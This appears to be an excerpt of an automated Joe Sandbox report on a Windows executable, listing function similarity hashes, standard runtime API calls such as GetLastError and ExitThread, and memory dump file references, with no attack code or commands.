                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2067211477-0
                                                                                                                                                                          • Opcode ID: ae3f8bb4fe257cc79dbb2d2f165059ab1c58b9f3a2a9237115300b53a347d4bb
                                                                                                                                                                          • Instruction ID: 44a128bab01037c82c91361d34951bc715ad0794a5119b2c87003fade3f6bab0
                                                                                                                                                                          • Opcode Fuzzy Hash: ae3f8bb4fe257cc79dbb2d2f165059ab1c58b9f3a2a9237115300b53a347d4bb
                                                                                                                                                                          • Instruction Fuzzy Hash: BA21D031A0A7428AEE10FB69A408879F3A1FF89BD0F854531EE4E43775DE7CE6008720
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF7ABC58023), ref: 00007FF7ABC58154
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF7ABC58023), ref: 00007FF7ABC581DF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ConsoleErrorLastMode
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 953036326-0
                                                                                                                                                                          • Opcode ID: 0af44ed879d04c6a77923aebd220237353c8c50281d91ab94cd28a593b70c73a
                                                                                                                                                                          • Instruction ID: feb807d5b0adf0817e7b32f006ff822421ded2bf720782b332325e01fac5b3b9
                                                                                                                                                                          • Opcode Fuzzy Hash: 0af44ed879d04c6a77923aebd220237353c8c50281d91ab94cd28a593b70c73a
                                                                                                                                                                          • Instruction Fuzzy Hash: A6912932B4AA5585F750AF6D88C0A7DAFA0BB44B88F950239DE0E536B5CF3CD581C320
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: ios_base::badbit set
                                                                                                                                                                          • API String ID: 73155330-3882152299
                                                                                                                                                                          • Opcode ID: c1169f8eb98a53ac9a0b8bd264596b5bdcb5148028f944edc5eecb64479fea85
                                                                                                                                                                          • Instruction ID: 4302a57df541abd53a9cc31777190de44c60b29b24a69d3150429f2a305e1481
                                                                                                                                                                          • Opcode Fuzzy Hash: c1169f8eb98a53ac9a0b8bd264596b5bdcb5148028f944edc5eecb64479fea85
                                                                                                                                                                          • Instruction Fuzzy Hash: 3651D662B1AB8582ED24EB59E000679A361FB65BD4F918731DEAD037F5DF3CE480C220
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                          • Opcode ID: 2c5a883d0f041aa252917f98a925284d0206d2befd72037d690fca7ed0463080
                                                                                                                                                                          • Instruction ID: 48a26886260bc8df05f52ba9c07788c3fd62391f6d1b436896d54a8631a8f83a
                                                                                                                                                                          • Opcode Fuzzy Hash: 2c5a883d0f041aa252917f98a925284d0206d2befd72037d690fca7ed0463080
                                                                                                                                                                          • Instruction Fuzzy Hash: 1F91E372F0771682FF14FA6CD548BB8A2A2AF10758F821535DD0D866B5DF2CFA118360
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_directory_iterator_open
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 56456669-0
                                                                                                                                                                          • Opcode ID: 0b41d4647d116bd5198f576b02a13b265af16fad780471928a2ce838859b37be
                                                                                                                                                                          • Instruction ID: ffcca33cbae29336c1ffab5e900d8ed6ed512c11427b89f60f5941bc7ff53346
                                                                                                                                                                          • Opcode Fuzzy Hash: 0b41d4647d116bd5198f576b02a13b265af16fad780471928a2ce838859b37be
                                                                                                                                                                          • Instruction Fuzzy Hash: 4D51D431F1A74642EE60BB1DE094B7DA2A1EF857A0FC14231DA5D076F5DE6CE4808710
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3251591375-0
                                                                                                                                                                          • Opcode ID: fe0f21b8207a9c1d681b1e86eca7ece4314975d930c51d0972b0bd39b63ad0f0
                                                                                                                                                                          • Instruction ID: f9769070a281479080a07164e5bf48653dc59d982b706782e467f058bb7025bf
                                                                                                                                                                          • Opcode Fuzzy Hash: fe0f21b8207a9c1d681b1e86eca7ece4314975d930c51d0972b0bd39b63ad0f0
                                                                                                                                                                          • Instruction Fuzzy Hash: 2E314D21E5B14741FA54BB6C985ABB9D292BFC2344FC74039E91E4B2F3DE2CB6448230
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00007FF7ABC570FC: GetLastError.KERNEL32(?,?,?,00007FF7ABC5167D,?,?,?,?,00007FF7ABC5A1B8,?,?,?,00007FF7ABC447BB), ref: 00007FF7ABC5710B
                                                                                                                                                                            • Part of subcall function 00007FF7ABC570FC: SetLastError.KERNEL32(?,?,?,00007FF7ABC5167D,?,?,?,?,00007FF7ABC5A1B8,?,?,?,00007FF7ABC447BB), ref: 00007FF7ABC571AB
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00007FF7ABC49295,?,?,?,?,00007FF7ABC490D9), ref: 00007FF7ABC49123
                                                                                                                                                                          • FreeLibraryAndExitThread.KERNEL32(?,?,?,00007FF7ABC49295,?,?,?,?,00007FF7ABC490D9), ref: 00007FF7ABC49139
                                                                                                                                                                          • ExitThread.KERNEL32 ref: 00007FF7ABC49142
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1991824761-0
                                                                                                                                                                          • Opcode ID: c99bafb6b63b6d6b4a0477b090e1c336143c64e24cabe7b9098992bbbfecb400
                                                                                                                                                                          • Instruction ID: f713c89b8f82506011796c1cd3332bd4f7000702f5caef0e062e661569732e59
                                                                                                                                                                          • Opcode Fuzzy Hash: c99bafb6b63b6d6b4a0477b090e1c336143c64e24cabe7b9098992bbbfecb400
                                                                                                                                                                          • Instruction Fuzzy Hash: ACF0C221A0A68296FF147B38C48CA7CA2A6AF45B34F9A4331C63D022F5CF7CD841C320
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                          • Opcode ID: 90b2bb542c3388067afa17ba55e6a045ef48b0742b450bfd02d82605817d26bb
                                                                                                                                                                          • Instruction ID: 464bfe784cb31a57780cf76acead42ca6fcb4631cedb48876c68f0edcc324442
                                                                                                                                                                          • Opcode Fuzzy Hash: 90b2bb542c3388067afa17ba55e6a045ef48b0742b450bfd02d82605817d26bb
                                                                                                                                                                          • Instruction Fuzzy Hash: 12D09E14F1A60252FB543B7858A99789A526F48752F82143CD81F463B3CD3CA68D8720
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 73155330-0
                                                                                                                                                                          • Opcode ID: bd354e9ddf7cbed29d13e34746afe35b9c6be54291eeb770e1ff61d8a9e546c9
                                                                                                                                                                          • Instruction ID: fdfc310769d868376f472c470eeefce52769969a362d7670f836cffd6e207453
                                                                                                                                                                          • Opcode Fuzzy Hash: bd354e9ddf7cbed29d13e34746afe35b9c6be54291eeb770e1ff61d8a9e546c9
                                                                                                                                                                          • Instruction Fuzzy Hash: 5E7127A2B0A79581EE10EB19E44577AE355FB85BD0F854536EE8D0BBB6DF3CE4408310
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                          • Opcode ID: 7f58a9c92a8fce4cc72087901250097e9265e0b94835121beaf569dd45793cf4
                                                                                                                                                                          • Instruction ID: d3a0f960040117cefd47eedaa928865a7bda0c7e5be50473100bb531f3621fba
                                                                                                                                                                          • Opcode Fuzzy Hash: 7f58a9c92a8fce4cc72087901250097e9265e0b94835121beaf569dd45793cf4
                                                                                                                                                                          • Instruction Fuzzy Hash: E7511D61B0F64146EB24BA2E9508FBBE292BF44BA4F865730DE6D437F5CE3CD5019620
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e5ecb5a3e12f91ffbc86fdd52a79ab38cfde5581c6d894850847f25b81b2adf2
                                                                                                                                                                          • Instruction ID: e9781423421f5ead4220f2bc8ba038f9a8cb6ea49c4448793799338138f7c5d3
                                                                                                                                                                          • Opcode Fuzzy Hash: e5ecb5a3e12f91ffbc86fdd52a79ab38cfde5581c6d894850847f25b81b2adf2
                                                                                                                                                                          • Instruction Fuzzy Hash: 6941B132B06A5585EB51AE2EE400779A7A1FF84FD8F954432CE0D67BB8DE38D8568310
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                          • Opcode ID: 04b78cf97d1ff0a22f420d264a7d88ac46121f9b2cffaf87a6c9d5deea7e0d7c
                                                                                                                                                                          • Instruction ID: e8e29db579aeacac1eb4a621d6cdeabc292b6d6369eee551808a8b7eeede9627
                                                                                                                                                                          • Opcode Fuzzy Hash: 04b78cf97d1ff0a22f420d264a7d88ac46121f9b2cffaf87a6c9d5deea7e0d7c
                                                                                                                                                                          • Instruction Fuzzy Hash: F131E472A1A60245EE50FB5CD4559BDB362EBD6B80FD64231E54E473F2DE7CE2008320
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF7ABC5388A,?,?,?,00007FF7ABC53C62,?,?,?,?,00007FF7ABC667E8,?,?,?), ref: 00007FF7ABC61A14
                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF7ABC5388A,?,?,?,00007FF7ABC53C62,?,?,?,?,00007FF7ABC667E8,?,?,?), ref: 00007FF7ABC61A7E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EnvironmentStrings$Free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3328510275-0
                                                                                                                                                                          • Opcode ID: 77f4bbf60c637820e889fe764b6ad60b108e400a594c2bcf546cb670c757a277
                                                                                                                                                                          • Instruction ID: 944a820d45924e42f502c3da22b148de1deb8d24ca24a3d030182d2e5262f68b
                                                                                                                                                                          • Opcode Fuzzy Hash: 77f4bbf60c637820e889fe764b6ad60b108e400a594c2bcf546cb670c757a277
                                                                                                                                                                          • Instruction Fuzzy Hash: 3B01CC11F1975541D910BB19641042AA360EF58FE0FC95230DF5D53BFADE2CE4429350
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF7ABC5BFAC,?,?,?,?,00000000,00007FF7ABC5C0B5), ref: 00007FF7ABC5C00C
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00007FF7ABC5BFAC,?,?,?,?,00000000,00007FF7ABC5C0B5), ref: 00007FF7ABC5C016
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                          • Opcode ID: 18e88116976d4eed816a16a67e84bae8f7ddcce54afb00a24ad4d2b6368889b5
                                                                                                                                                                          • Instruction ID: 38e81a813ad4ba66e94f556e1e20643fdb24780a481beb5a442678d7619a3147
                                                                                                                                                                          • Opcode Fuzzy Hash: 18e88116976d4eed816a16a67e84bae8f7ddcce54afb00a24ad4d2b6368889b5
                                                                                                                                                                          • Instruction Fuzzy Hash: 7B11C461609A8181DA60AB2DE884479A761EB85BF4F950331EE7D477F9CF3CD0548710
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                                                          • Opcode ID: ebcf236077280dc1a6399f02e22a1564b1da6c0fbd5af7dbc20a16d9120f82ea
                                                                                                                                                                          • Instruction ID: f9b1e98003d9b20eefa329db79680293c13a2b6b2bc6055aa49e427c488c1ea1
                                                                                                                                                                          • Opcode Fuzzy Hash: ebcf236077280dc1a6399f02e22a1564b1da6c0fbd5af7dbc20a16d9120f82ea
                                                                                                                                                                          • Instruction Fuzzy Hash: 9201D621B0C68282EB44A72EB040B2AF7909BC43A4F944034E999427B8DFBCD4848F21
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorExitLastThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1611280651-0
                                                                                                                                                                          • Opcode ID: 9adcf061b8f2bb1fc30e3fc29ab42b48d7075bfc2929998413704bec6448b1cf
                                                                                                                                                                          • Instruction ID: bb178b5ba088e8530775df82adecb26082523446e734fe52d69f16ef9649ff4c
                                                                                                                                                                          • Opcode Fuzzy Hash: 9adcf061b8f2bb1fc30e3fc29ab42b48d7075bfc2929998413704bec6448b1cf
                                                                                                                                                                          • Instruction Fuzzy Hash: 88F0B421E0B74287EF14BBB9885997DA261EF59B10F864134D90D833F6DF2CE584C320
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Concurrency::cancel_current_task
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 118556049-0
                                                                                                                                                                          • Opcode ID: 7003ff1d198486304dd6a1b10bd0611cb7e7be912b70eb8aca42fa367c7aee25
                                                                                                                                                                          • Instruction ID: f44433884046dcdcc31a9b2aa005c7f7975263718791b9d6500f8eba5f928ead
                                                                                                                                                                          • Opcode Fuzzy Hash: 7003ff1d198486304dd6a1b10bd0611cb7e7be912b70eb8aca42fa367c7aee25
                                                                                                                                                                          • Instruction Fuzzy Hash: F7E0EC45F2B10741FE78316D144AD79C1450F65770EDA1B30DDBE082F3BD1CA69A8130
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,?,?,00007FF7ABC62B26,?,?,?,00007FF7ABC62EA3,?,?,00000000,00007FF7ABC633AD,?,?,?,00007FF7ABC632DF), ref: 00007FF7ABC58356
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF7ABC62B26,?,?,?,00007FF7ABC62EA3,?,?,00000000,00007FF7ABC633AD,?,?,?,00007FF7ABC632DF), ref: 00007FF7ABC58360
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
